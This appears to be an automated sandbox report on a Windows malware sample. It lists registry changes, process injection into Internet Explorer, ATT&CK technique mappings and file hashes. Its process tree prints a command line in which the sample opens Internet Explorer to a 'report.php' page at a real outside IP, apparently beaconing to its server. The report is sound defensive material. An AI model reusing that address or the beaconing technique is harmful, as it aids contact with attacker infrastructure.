Key created	\REGISTRY\USER\S-1-5-21-877519540-908060166-1852957295-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	IEXPLORE.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-877519540-908060166-1852957295-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 406ec14c4199da01	IEXPLORE.exe
Key created	\REGISTRY\USER\S-1-5-21-877519540-908060166-1852957295-1000\Software\Microsoft\Internet Explorer\GPU	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-877519540-908060166-1852957295-1000\Software\Microsoft\Internet Explorer\DomainSuggestion	IEXPLORE.exe
Key created	\REGISTRY\USER\S-1-5-21-877519540-908060166-1852957295-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-877519540-908060166-1852957295-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\AdminActive\{738E78F4-0534-11EF-9107-7294AD3236B0} = "0"	IEXPLORE.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-877519540-908060166-1852957295-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	IEXPLORE.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-877519540-908060166-1852957295-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FullScreen = "no"	IEXPLORE.exe
Key created	\REGISTRY\USER\S-1-5-21-877519540-908060166-1852957295-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-877519540-908060166-1852957295-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 5042ba4c4199da01	IEXPLORE.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-877519540-908060166-1852957295-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000fa1cacc1b5bc1b46b672921b3ff780860000000002000000000010660000000100002000000039ceecdf71d01d99ef0643aeee2ca2842de71635f82158d983078fca17619731000000000e80000000020000200000002697ff5fd255e8ac72bdfd86a8519cacfee293e499a884fd2f1909d4c6196eed20000000f10947ba1d5ab8f0d47ca64c2b1864da89bd757cb709cc11d25650d089e97aa1400000003ccaf392dc55323f4c93ddd4386d70caee8c330dbd798d4ee5977c7cd0b399688b521fd5b12040678df67f3eb16b2590581a6b18c40b3ab460f899c24e133be5	IEXPLORE.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-877519540-908060166-1852957295-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	IEXPLORE.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-877519540-908060166-1852957295-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	IEXPLORE.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-877519540-908060166-1852957295-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	IEXPLORE.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-877519540-908060166-1852957295-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	IEXPLORE.exe
Key created	\REGISTRY\USER\S-1-5-21-877519540-908060166-1852957295-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	IEXPLORE.exe
Key created	\REGISTRY\USER\S-1-5-21-877519540-908060166-1852957295-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	IEXPLORE.exe
Key created	\REGISTRY\USER\S-1-5-21-877519540-908060166-1852957295-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	IEXPLORE.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-877519540-908060166-1852957295-1000\SOFTWARE\Microsoft\Internet Explorer\GPU\AdapterInfo = "vendorId=\"0x10de\",deviceID=\"0x8c\",subSysID=\"0x0\",revision=\"0x0\",version=\"10.0.19041.546\"hypervisor=\"No Hypervisor (No SLAT)\""	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-877519540-908060166-1852957295-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000fa1cacc1b5bc1b46b672921b3ff7808600000000020000000000106600000001000020000000e520dfa5ed3e07d65eada16b0eac7bf8ce112e9b42d7d1b31f65e6ce4c1ff487000000000e800000000200002000000002c5648587f07228ba10dc2dd2a727cbb56dd30fb0e4e031ff3439f3564ad91320000000e4ec9250e03b3f336b6e9e9811916e0f03ca102b9521af53dcf64be6a02b9f3f400000003ccb95186b5bccd29e4d0fc6bc6debf8e1a66662562694f9740fd179be43cc5b07342c59093b027d05ace4edec0327d2fdc428b16e5545e1fd9e9adcd94d4448	IEXPLORE.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-877519540-908060166-1852957295-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "420452709"	IEXPLORE.exe

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

IEXPLORE.exe

pid process

3988 IEXPLORE.exe
Suspicious use of SetWindowsHookEx 6 IoCs

Processes:

IEXPLORE.exeIEXPLORE.EXE

pid process

3988 IEXPLORE.exe
3988 IEXPLORE.exe
1508 IEXPLORE.EXE
1508 IEXPLORE.EXE
1508 IEXPLORE.EXE
1508 IEXPLORE.EXE

pid	process
3988	IEXPLORE.exe

pid	process
3988	IEXPLORE.exe
3988	IEXPLORE.exe
1508	IEXPLORE.EXE
1508	IEXPLORE.EXE
1508	IEXPLORE.EXE
1508	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 5 IoCs

Processes:

04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exeIEXPLORE.exe

description	pid	process	target process
PID 2204 wrote to memory of 3988	2204	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe	IEXPLORE.exe
PID 2204 wrote to memory of 3988	2204	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe	IEXPLORE.exe
PID 3988 wrote to memory of 1508	3988	IEXPLORE.exe	IEXPLORE.EXE
PID 3988 wrote to memory of 1508	3988	IEXPLORE.exe	IEXPLORE.EXE
PID 3988 wrote to memory of 1508	3988	IEXPLORE.exe	IEXPLORE.EXE

C:\Users\Admin\AppData\Local\Temp\04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe"
1⤵
- Drops file in System32 directory
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:2204

C:\Program Files\Internet Explorer\IEXPLORE.exe
"C:\Program Files\Internet Explorer\IEXPLORE" 212.33.237.86/images/1/report.php
2⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3988

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3988 CREDAT:17410 /prefetch:2
3⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:1508

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Unsecured Credentials

1

T1552

Credentials In Files

1

T1552.001

Discovery

Lateral Movement

Collection

Data from Local System

1

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\7-Zip\7z.exe
Filesize
28.3MB

MD5
d50c5811dbe2f65397332fc253c99d90

SHA1
f85870a9e1bf0e4df42c0919cd59b0a3cee8f2c2

SHA256
3e6a80f55160272f530412b5c14beed73da01fec35800c9ff4307850a742d499

SHA512
a3b0b03b5d7b2aec2e7c0014dae3694ed7428a718bee69dca70afb044eff85b77b02e6be9c270319a74f225f821a9c2aaa07aa425a01a8fcb1ecd3863a9864df

Download Submit

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads